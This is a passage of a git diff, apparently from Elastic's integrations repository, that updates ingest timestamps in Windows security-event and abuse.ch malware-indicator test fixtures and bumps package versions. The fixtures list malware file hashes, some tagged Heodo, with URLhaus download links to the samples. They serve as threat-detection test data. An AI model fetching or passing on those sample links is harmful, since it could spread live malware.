"kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4737.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4737.json-expected.json index 8da8b088c21..a5a85ef7dbb 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4737.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4737.json-expected.json @@ -63,7 +63,7 @@ "name": "WIN-41OB2LO92CR.wlbeat.local" }, "event": { - "ingested": "2021-07-30T21:06:11.359274337Z", + "ingested": "2021-12-09T13:46:00.856335200Z", "code": "4737", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4738-account-changed.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4738-account-changed.json-expected.json index ed72a29d7ba..009c5a333ee 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4738-account-changed.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4738-account-changed.json-expected.json @@ -88,7 +88,7 @@ "name": "WIN-41OB2LO92CR" }, "event": { - "ingested": "2021-10-19T11:55:31.700998400Z", + "ingested": "2021-12-09T13:46:01.054603700Z", "code": "4738", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4740-account-locked-out.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4740-account-locked-out.json-expected.json index fbf132d5e57..95558c460f5 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4740-account-locked-out.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4740-account-locked-out.json-expected.json @@ -62,7 +62,7 @@ "name": "WIN-41OB2LO92CR" }, "event": { - "ingested": "2021-10-19T11:55:31.973015500Z", + "ingested": "2021-12-09T13:46:01.309395100Z", "code": "4740", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4754.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4754.json-expected.json index 98936ddd724..c03c1549d86 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4754.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4754.json-expected.json @@ -63,7 +63,7 @@ "name": "WIN-41OB2LO92CR.wlbeat.local" }, "event": { - "ingested": "2021-07-30T21:06:11.708171901Z", + "ingested": "2021-12-09T13:46:01.534580700Z", "code": "4754", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4755.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4755.json-expected.json index 3c06f66ca45..b105ecd48d6 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4755.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4755.json-expected.json @@ -63,7 +63,7 @@ "name": "WIN-41OB2LO92CR.wlbeat.local" }, "event": { - "ingested": "2021-07-30T21:06:11.832228149Z", + "ingested": "2021-12-09T13:46:01.729553600Z", "code": "4755", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4756.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4756.json-expected.json index 76ea0c8c6ed..923556d58fd 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4756.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4756.json-expected.json @@ -63,7 +63,7 @@ "name": "WIN-41OB2LO92CR.wlbeat.local" }, "event": { - "ingested": "2021-10-19T11:55:32.637206400Z", + "ingested": "2021-12-09T13:46:01.936912200Z", "code": "4756", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4757.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4757.json-expected.json index ad78bc1f3a9..9e51f4f2ef9 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4757.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4757.json-expected.json @@ -63,7 +63,7 @@ "name": "WIN-41OB2LO92CR.wlbeat.local" }, "event": { - "ingested": "2021-10-19T11:55:32.941287Z", + "ingested": "2021-12-09T13:46:02.212799Z", "code": "4757", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4758.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4758.json-expected.json index 412f1496f45..629aa9d4fd9 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4758.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4758.json-expected.json @@ -61,7 +61,7 @@ "name": "WIN-41OB2LO92CR.wlbeat.local" }, "event": { - "ingested": "2021-07-30T21:06:12.161947534Z", + "ingested": "2021-12-09T13:46:02.470400500Z", "code": "4758", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4764.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4764.json-expected.json index 62745ca7d0d..d880de8ee79 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4764.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4764.json-expected.json @@ -62,7 +62,7 @@ "name": "WIN-41OB2LO92CR.wlbeat.local" }, "event": { - "ingested": "2021-07-30T21:06:12.251549200Z", + "ingested": "2021-12-09T13:46:02.674299700Z", "code": "4764", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4767-account-unlocked.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4767-account-unlocked.json-expected.json index 6842c9bb8df..70030989636 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4767-account-unlocked.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4767-account-unlocked.json-expected.json @@ -62,7 +62,7 @@ "name": "WIN-41OB2LO92CR" }, "event": { - "ingested": "2021-10-19T11:55:33.688576100Z", + "ingested": "2021-12-09T13:46:02.863165Z", "code": "4767", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4781-account-renamed.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4781-account-renamed.json-expected.json index 9655c6a469e..d36f2e08438 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4781-account-renamed.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4781-account-renamed.json-expected.json @@ -65,7 +65,7 @@ "name": "WIN-41OB2LO92CR" }, "event": { - "ingested": "2021-10-19T11:55:33.918515Z", + "ingested": "2021-12-09T13:46:03.085219100Z", "code": "4781", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", @@ -156,7 +156,7 @@ "name": "WIN-41OB2LO92CR" }, "event": { - "ingested": "2021-10-19T11:55:33.918523800Z", + "ingested": "2021-12-09T13:46:03.085223200Z", "code": "4781", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4798.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4798.json-expected.json index c2fa40482a3..ed2647237a8 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4798.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4798.json-expected.json @@ -64,7 +64,7 @@ "name": "WIN-41OB2LO92CR" }, "event": { - "ingested": "2021-10-19T11:55:34.345020800Z", + "ingested": "2021-12-09T13:46:03.473678500Z", "code": "4798", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4799.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4799.json-expected.json index 13fc731f171..684f24c0a0b 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4799.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4799.json-expected.json @@ -63,7 +63,7 @@ "name": "WIN-41OB2LO92CR" }, "event": { - "ingested": "2021-07-30T21:06:12.712469394Z", + "ingested": "2021-12-09T13:46:03.692317800Z", "code": "4799", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-logoff.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-logoff.json-expected.json index a5367b1d769..bab7d156087 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-logoff.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-logoff.json-expected.json @@ -59,7 +59,7 @@ "name": "WIN-41OB2LO92CR" }, "event": { - "ingested": "2021-07-30T21:06:12.801731825Z", + "ingested": "2021-12-09T13:46:03.893129100Z", "code": "4634", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", @@ -137,7 +137,7 @@ "name": "WIN-41OB2LO92CR" }, "event": { - "ingested": "2021-07-30T21:06:12.801734292Z", + "ingested": "2021-12-09T13:46:03.893134600Z", "code": "4634", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2019-4688-process-created.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2019-4688-process-created.json-expected.json index fcb5bb17d96..abedc3063b1 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2019-4688-process-created.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2019-4688-process-created.json-expected.json @@ -81,7 +81,7 @@ "name": "vagrant" }, "event": { - "ingested": "2021-10-19T11:55:35.129471700Z", + "ingested": "2021-12-09T13:46:04.226615400Z", "code": "4688", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2019-4689-process-exited.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2019-4689-process-exited.json-expected.json index dfc2b20d07c..cb2b04519a1 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2019-4689-process-exited.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2019-4689-process-exited.json-expected.json @@ -63,7 +63,7 @@ "name": "vagrant" }, "event": { - "ingested": "2021-07-30T21:06:13.111337705Z", + "ingested": "2021-12-09T13:46:04.468666400Z", "code": "4689", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", @@ -145,7 +145,7 @@ "name": "vagrant" }, "event": { - "ingested": "2021-07-30T21:06:13.111340689Z", + "ingested": "2021-12-09T13:46:04.468674800Z", "code": "4689", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", @@ -227,7 +227,7 @@ "name": "vagrant" }, "event": { - "ingested": "2021-07-30T21:06:13.111341286Z", + "ingested": "2021-12-09T13:46:04.468680700Z", "code": "4689", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-unknown.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-unknown.json-expected.json index 2f34a127b47..496acdd0433 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-unknown.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-unknown.json-expected.json @@ -24,7 +24,7 @@ "level": "information" }, "event": { - "ingested": "2021-10-05T21:22:48.942317400Z", + "ingested": "2021-12-09T13:46:04.990550600Z", "code": "65536", "provider": "Microsoft-Windows-Eventlog", "kind": "event", diff --git a/packages/system/manifest.yml b/packages/system/manifest.yml index a18f5f1c951..e74f1bc8d87 100644 --- a/packages/system/manifest.yml +++ b/packages/system/manifest.yml @@ -1,7 +1,7 @@ format_version: 1.0.0 name: system title: System -version: 1.6.4 +version: 1.6.5 license: basic description: Collect system logs and metrics from your servers with Elastic Agent. type: integration diff --git a/packages/ti_abusech/changelog.yml b/packages/ti_abusech/changelog.yml index 6e5572a9d49..be88686cfcb 100644 --- a/packages/ti_abusech/changelog.yml +++ b/packages/ti_abusech/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.1.3" + changes: + - description: Change test public IPs to the supported subset + type: bugfix + link: https://github.com/elastic/integrations/pull/2327 - version: "1.1.2" changes: - description: Fixing typo in base-fields.yml diff --git a/packages/ti_abusech/data_stream/malware/_dev/test/pipeline/test-malware-ndjson.log-expected.json b/packages/ti_abusech/data_stream/malware/_dev/test/pipeline/test-malware-ndjson.log-expected.json index a289a843476..c389ac03ae4 100644 --- a/packages/ti_abusech/data_stream/malware/_dev/test/pipeline/test-malware-ndjson.log-expected.json +++ b/packages/ti_abusech/data_stream/malware/_dev/test/pipeline/test-malware-ndjson.log-expected.json @@ -36,7 +36,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:05.682403442Z", + "ingested": "2021-12-13T08:40:03.807747500Z", "original": "{\"md5_hash\":\"7871286a8f1f68a14b18ae475683f724\",\"sha256_hash\":\"48a6aee18bcfe9058b35b1018832aef1c9efd8f50ac822f49abb484a5e2a4b1f\",\"file_type\":\"dll\",\"file_size\":\"277504\",\"signature\":null,\"firstseen\":\"2021-01-14 06:14:05\",\"urlhaus_download\":\"https://urlhaus-api.abuse.ch/v1/download/48a6aee18bcfe9058b35b1018832aef1c9efd8f50ac822f49abb484a5e2a4b1f/\",\"virustotal\":null,\"imphash\":\"68aea345b134d576ccdef7f06db86088\",\"ssdeep\":\"6144:+60EDP6uCLfGw/GpxXinM1BCo1PlumGx2mx2tXd0t115JG5:X5DpBw/KViMTB1MnEWk0115JW\",\"tlsh\":\"1344D022AD13DD37E1F400FCA6A58F8561626E381F00A89777D41F8A98356F1BB2B717\"}", "category": "threat", "type": "indicator", @@ -82,7 +82,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:05.682431004Z", + "ingested": "2021-12-13T08:40:03.807764300Z", "original": "{\"md5_hash\":\"7b4c77dc293347b467fb860e34515163\",\"sha256_hash\":\"ec59538e8de8525b1674b3b8fe0c180ac822145350bcce054ad3fc6b95b1b5a4\",\"file_type\":\"dll\",\"file_size\":\"277504\",\"signature\":null,\"firstseen\":\"2021-01-14 06:11:41\",\"urlhaus_download\":\"https://urlhaus-api.abuse.ch/v1/download/ec59538e8de8525b1674b3b8fe0c180ac822145350bcce054ad3fc6b95b1b5a4/\",\"virustotal\":null,\"imphash\":\"68aea345b134d576ccdef7f06db86088\",\"ssdeep\":\"6144:+60EDP6uCLfGw/GpxXinM1BCo1PlumGx2mx2tXd0t115JGY:X5DpBw/KViMTB1MnEWk0115Jr\",\"tlsh\":\"4E44D022AD13DD37E1F400FCA6A58F8561626E381F00A89777D41F8A98356F1BB2B717\"}", "category": "threat", "type": "indicator", @@ -134,7 +134,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:05.682438568Z", + "ingested": "2021-12-13T08:40:03.807776600Z", "original": "{\"md5_hash\":\"373d34874d7bc89fd4cefa6272ee80bf\",\"sha256_hash\":\"b0e914d1bbe19433cc9df64ea1ca07fe77f7b150b511b786e46e007941a62bd7\",\"file_type\":\"dll\",\"file_size\":\"277504\",\"signature\":null,\"firstseen\":\"2021-01-14 06:11:22\",\"urlhaus_download\":\"https://urlhaus-api.abuse.ch/v1/download/b0e914d1bbe19433cc9df64ea1ca07fe77f7b150b511b786e46e007941a62bd7/\",\"virustotal\":{\"result\":\"25 / 66\",\"percent\":\"37.88\",\"link\":\"https://www.virustotal.com/gui/file/b0e914d1bbe19433cc9df64ea1ca07fe77f7b150b511b786e46e007941a62bd7/detection/f-b0e914d\"},\"imphash\":\"68aea345b134d576ccdef7f06db86088\",\"ssdeep\":\"6144:+60EDP6uCLfGw/GpxXinM1BCo1PlumGx2mx2tXd0t115JGG:X5DpBw/KViMTB1MnEWk0115Jd\",\"tlsh\":\"7544D022AD13DD37E1F400FCA6A58F8561626E381F00A89777D41F8A98356F1BB2B717\"}", "category": "threat", "type": "indicator", @@ -180,7 +180,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:05.682444509Z", + "ingested": "2021-12-13T08:40:03.807787900Z", "original": "{\"md5_hash\":\"e2e02aae857488dbdbe6631c29abf3f8\",\"sha256_hash\":\"7483e834a73fb6817769596fe4c0fa01d28639f52bbbdc2b8a56c36d466dd7f8\",\"file_type\":\"dll\",\"file_size\":\"284672\",\"signature\":null,\"firstseen\":\"2021-01-14 06:11:21\",\"urlhaus_download\":\"https://urlhaus-api.abuse.ch/v1/download/7483e834a73fb6817769596fe4c0fa01d28639f52bbbdc2b8a56c36d466dd7f8/\",\"virustotal\":null,\"imphash\":\"68aea345b134d576ccdef7f06db86088\",\"ssdeep\":\"6144:0hlBeZgR9LqvgFcwNAwhGV52n5Dv4JdEqvQykqRqYdBx8pRA7OZJ9:0h3eZgRQCcw+MN54dEq7kqRtoLZH\",\"tlsh\":\"5554CF22E642C926F1E900FCB2A98B4451257E355F40F4D777C40FABA835AE2AF27717\"}", "category": "threat", "type": "indicator", @@ -223,7 +223,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:05.682449689Z", + "ingested": "2021-12-13T08:40:03.807799200Z", "original": "{\"md5_hash\":\"3e988e32b0c3c230d534e286665b89a5\",\"sha256_hash\":\"760e729426fb115b967a41e5a6f2f42d7a52a5cee74ed99065a6dc39bf89f59b\",\"file_type\":\"unknown\",\"file_size\":\"352\",\"signature\":null,\"firstseen\":\"2021-01-14 06:08:02\",\"urlhaus_download\":\"https://urlhaus-api.abuse.ch/v1/download/760e729426fb115b967a41e5a6f2f42d7a52a5cee74ed99065a6dc39bf89f59b/\",\"virustotal\":null,\"imphash\":null,\"ssdeep\":\"6:TE6ll8uXi0jIAv6BHvPuA7RKTmOQamsQMGvMQgTYbtsWsQ72hCqPZG/:TTll8uTo5uA7RKtQamsS0QJfsQ7mCR\",\"tlsh\":\"3CE0C002AB26C036500D154C221655B3B871911503CA14E6A6824BEA765D4A3290D190\"}", "category": "threat", "type": "indicator", @@ -275,7 +275,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:05.682454859Z", + "ingested": "2021-12-13T08:40:03.807810400Z", "original": "{\"md5_hash\":\"dcc20d534cdf29eab03d8148bf728857\",\"sha256_hash\":\"86655c0bcf9b21b5efc682f58eb80f42811042ba152358e1bfbbb867315a60ac\",\"file_type\":\"dll\",\"file_size\":\"277504\",\"signature\":null,\"firstseen\":\"2021-01-14 06:08:02\",\"urlhaus_download\":\"https://urlhaus-api.abuse.ch/v1/download/86655c0bcf9b21b5efc682f58eb80f42811042ba152358e1bfbbb867315a60ac/\",\"virustotal\":{\"result\":\"27 / 69\",\"percent\":\"39.13\",\"link\":\"https://www.virustotal.com/gui/file/86655c0bcf9b21b5efc682f58eb80f42811042ba152358e1bfbbb867315a60ac/detection/f-86655c0\"},\"imphash\":\"68aea345b134d576ccdef7f06db86088\",\"ssdeep\":\"6144:+60EDP6uCLfGw/GpxXinM1BCo1PlumGx2mx2tXd0t115JGI:X5DpBw/KViMTB1MnEWk0115JH\",\"tlsh\":\"0D44D022AD13DD37E1F400FCA6A58F8561626E381F00A89777D41F8A98356F1BB2B717\"}", "category": "threat", "type": "indicator", @@ -321,7 +321,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:05.682459527Z", + "ingested": "2021-12-13T08:40:03.807886200Z", "original": "{\"md5_hash\":\"f6facbf7a90b9e67a6de9f6634eb40ba\",\"sha256_hash\":\"e91c9e11d3ce4f55fabd7196279367482d2fabfa32df81e614b15fc53b4e26be\",\"file_type\":\"dll\",\"file_size\":\"284672\",\"signature\":null,\"firstseen\":\"2021-01-14 06:07:53\",\"urlhaus_download\":\"https://urlhaus-api.abuse.ch/v1/download/e91c9e11d3ce4f55fabd7196279367482d2fabfa32df81e614b15fc53b4e26be/\",\"virustotal\":null,\"imphash\":\"68aea345b134d576ccdef7f06db86088\",\"ssdeep\":\"6144:0hlBeZgR9LqvgFcwNAwhGV52n5Dv4JdEqvQykqRqYdBx8pRA7OZJ1:0h3eZgRQCcw+MN54dEq7kqRtoLZL\",\"tlsh\":\"2554CF22E642C926F1E900FCB2A98B4451257E355F40F4D777C40FABA835AE2AF27717\"}", "category": "threat", "type": "indicator", @@ -367,7 +367,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:05.682464887Z", + "ingested": "2021-12-13T08:40:03.807898100Z", "original": "{\"md5_hash\":\"44325fd5bdda2e2cdea07c3a39953bb1\",\"sha256_hash\":\"beedbbcacfc34b5edd8c68e3e4acf364992ebbcd989548e09e38fa03c5659bac\",\"file_type\":\"dll\",\"file_size\":\"277504\",\"signature\":null,\"firstseen\":\"2021-01-14 06:07:41\",\"urlhaus_download\":\"https://urlhaus-api.abuse.ch/v1/download/beedbbcacfc34b5edd8c68e3e4acf364992ebbcd989548e09e38fa03c5659bac/\",\"virustotal\":null,\"imphash\":\"68aea345b134d576ccdef7f06db86088\",\"ssdeep\":\"6144:+60EDP6uCLfGw/GpxXinM1BCo1PlumGx2mx2tXd0t115JG/:X5DpBw/KViMTB1MnEWk0115Jg\",\"tlsh\":\"A044D022AD13DD37E1F400FCA6A58F8561626E381F00A89777D41F8A98356F1BB2B717\"}", "category": "threat", "type": "indicator", @@ -415,7 +415,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:05.682469937Z", + "ingested": "2021-12-13T08:40:03.807909300Z", "original": "{\"md5_hash\":\"4c549051950522a3f1b0814aa9b1f6d1\",\"sha256_hash\":\"7cba55da723c0e020267a02e6ffc83e03a83701757fc4ec65ea398618ad881cf\",\"file_type\":\"dll\",\"file_size\":\"277504\",\"signature\":\"Heodo\",\"firstseen\":\"2021-01-14 06:07:31\",\"urlhaus_download\":\"https://urlhaus-api.abuse.ch/v1/download/7cba55da723c0e020267a02e6ffc83e03a83701757fc4ec65ea398618ad881cf/\",\"virustotal\":null,\"imphash\":\"68aea345b134d576ccdef7f06db86088\",\"ssdeep\":\"6144:+60EDP6uCLfGw/GpxXinM1BCo1PlumGx2mx2tXd0t115JG4:X5DpBw/KViMTB1MnEWk0115Jv\",\"tlsh\":\"4544D022AD13DD37E1F400FCA6A58F8561626E381F00A89777D41F8A98356F1BB2B717\"}", "category": "threat", "type": "indicator", @@ -461,7 +461,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:05.682474806Z", + "ingested": "2021-12-13T08:40:03.807920500Z", "original": "{\"md5_hash\":\"d7333113098d88b6a5dd5b8eb24f9b87\",\"sha256_hash\":\"426be5e085e6bbad8430223dc89d8d3ced497133f8d478fd00005bcbb73399d4\",\"file_type\":\"dll\",\"file_size\":\"284672\",\"signature\":null,\"firstseen\":\"2021-01-14 06:07:07\",\"urlhaus_download\":\"https://urlhaus-api.abuse.ch/v1/download/426be5e085e6bbad8430223dc89d8d3ced497133f8d478fd00005bcbb73399d4/\",\"virustotal\":null,\"imphash\":\"68aea345b134d576ccdef7f06db86088\",\"ssdeep\":\"6144:0hlBeZgR9LqvgFcwNAwhGV52n5Dv4JdEqvQykqRqYdBx8pRA7OZJw:0h3eZgRQCcw+MN54dEq7kqRtoLZW\",\"tlsh\":\"9454CF22E642C926F1E900FCB2A98B4451257E355F40F4D777C40FABA835AE2AF27717\"}", "category": "threat", "type": "indicator", @@ -507,7 +507,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:05.682479505Z", + "ingested": "2021-12-13T08:40:03.807931800Z", "original": "{\"md5_hash\":\"c8dbb261c1f450534c3693da2f4b479f\",\"sha256_hash\":\"25093afdaeb3ea000743ab843360a6b64f58c0a1ab950072ba6528056735deb9\",\"file_type\":\"dll\",\"file_size\":\"277504\",\"signature\":null,\"firstseen\":\"2021-01-14 06:07:07\",\"urlhaus_download\":\"https://urlhaus-api.abuse.ch/v1/download/25093afdaeb3ea000743ab843360a6b64f58c0a1ab950072ba6528056735deb9/\",\"virustotal\":null,\"imphash\":\"68aea345b134d576ccdef7f06db86088\",\"ssdeep\":\"6144:+60EDP6uCLfGw/GpxXinM1BCo1PlumGx2mx2tXd0t115JGe:X5DpBw/KViMTB1MnEWk0115JR\",\"tlsh\":\"F344D022AD13DD37E1F400FCA6A58F8561626E381F00A89777D41F8A98356F1BB2B717\"}", "category": "threat", "type": "indicator", @@ -553,7 +553,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:05.682484534Z", + "ingested": "2021-12-13T08:40:03.807943800Z", "original": "{\"md5_hash\":\"714953f1d0031a4bb2f0c44afd015931\",\"sha256_hash\":\"b3327a96280365e441057f490df6261c9a2400fd63719eb9a7a0c9db95beecc5\",\"file_type\":\"dll\",\"file_size\":\"277504\",\"signature\":null,\"firstseen\":\"2021-01-14 06:07:06\",\"urlhaus_download\":\"https://urlhaus-api.abuse.ch/v1/download/b3327a96280365e441057f490df6261c9a2400fd63719eb9a7a0c9db95beecc5/\",\"virustotal\":null,\"imphash\":\"68aea345b134d576ccdef7f06db86088\",\"ssdeep\":\"6144:+60EDP6uCLfGw/GpxXinM1BCo1PlumGx2mx2tXd0t115JGc:X5DpBw/KViMTB1MnEWk0115J7\",\"tlsh\":\"F644D022AD13DD37E1F400FCA6A58F8561626E381F00A89777D41F8A98356F1BB2B717\"}", "category": "threat", "type": "indicator", @@ -599,7 +599,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:05.682493160Z", + "ingested": "2021-12-13T08:40:03.807955400Z", "original": "{\"md5_hash\":\"20fd22742500d4cec123398afc3d3672\",\"sha256_hash\":\"e92b54904391c171238863b584355197ba4508f73320a8e89afbb5425fc2dc4b\",\"file_type\":\"dll\",\"file_size\":\"277504\",\"signature\":null,\"firstseen\":\"2021-01-14 06:07:00\",\"urlhaus_download\":\"https://urlhaus-api.abuse.ch/v1/download/e92b54904391c171238863b584355197ba4508f73320a8e89afbb5425fc2dc4b/\",\"virustotal\":null,\"imphash\":\"68aea345b134d576ccdef7f06db86088\",\"ssdeep\":\"6144:+60EDP6uCLfGw/GpxXinM1BCo1PlumGx2mx2tXd0t115JGc:X5DpBw/KViMTB1MnEWk0115JP\",\"tlsh\":\"BE44D022AD13DD37E1F400FCA6A58F8561626E381F00A89777D41F8A98356F1BB2B717\"}", "category": "threat", "type": "indicator", @@ -645,7 +645,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:05.682499282Z", + "ingested": "2021-12-13T08:40:03.808039Z", "original": "{\"md5_hash\":\"aa81ceea053797a6f8c38a0f2f9b80b0\",\"sha256_hash\":\"dd15e74b3cd3a4fdb5f47adefd6f90e27d5a20e01316cc791711f6dce7c0f52e\",\"file_type\":\"dll\",\"file_size\":\"277504\",\"signature\":null,\"firstseen\":\"2021-01-14 06:06:36\",\"urlhaus_download\":\"https://urlhaus-api.abuse.ch/v1/download/dd15e74b3cd3a4fdb5f47adefd6f90e27d5a20e01316cc791711f6dce7c0f52e/\",\"virustotal\":null,\"imphash\":\"68aea345b134d576ccdef7f06db86088\",\"ssdeep\":\"6144:+60EDP6uCLfGw/GpxXinM1BCo1PlumGx2mx2tXd0t115JGf:X5DpBw/KViMTB1MnEWk0115Jo\",\"tlsh\":\"CC44D022AD13DD37E1F400FCA6A58F8561626E381F00A89777D41F8A98356F1BB2B717\"}", "category": "threat", "type": "indicator", @@ -693,7 +693,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:05.682504943Z", + "ingested": "2021-12-13T08:40:03.808106100Z", "original": "{\"md5_hash\":\"a2ce6795664c0fa93b07fa54ba868991\",\"sha256_hash\":\"0fae1eeabc4f5e07bd16f7851aec5ab6032d407c7ff0270f2b6e85c2a3efebd1\",\"file_type\":\"dll\",\"file_size\":\"277504\",\"signature\":\"Heodo\",\"firstseen\":\"2021-01-14 06:06:13\",\"urlhaus_download\":\"https://urlhaus-api.abuse.ch/v1/download/0fae1eeabc4f5e07bd16f7851aec5ab6032d407c7ff0270f2b6e85c2a3efebd1/\",\"virustotal\":null,\"imphash\":\"68aea345b134d576ccdef7f06db86088\",\"ssdeep\":\"6144:+60EDP6uCLfGw/GpxXinM1BCo1PlumGx2mx2tXd0t115JGD:X5DpBw/KViMTB1MnEWk0115JY\",\"tlsh\":\"8C44D022AD13DD37E1F400FCA6A58F8561626E381F00A89777D41F8A98356F1BB2B717\"}", "category": "threat", "type": "indicator", @@ -739,7 +739,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:05.682509581Z", + "ingested": "2021-12-13T08:40:03.808119Z", "original": "{\"md5_hash\":\"9b9bac158dacb9c2f5511e9c464a7de4\",\"sha256_hash\":\"07a9d84c0b2c8cf1fd90ab409b9399d06920ab4b6efb647b5a3b9bef1045ee7e\",\"file_type\":\"dll\",\"file_size\":\"280064\",\"signature\":null,\"firstseen\":\"2021-01-14 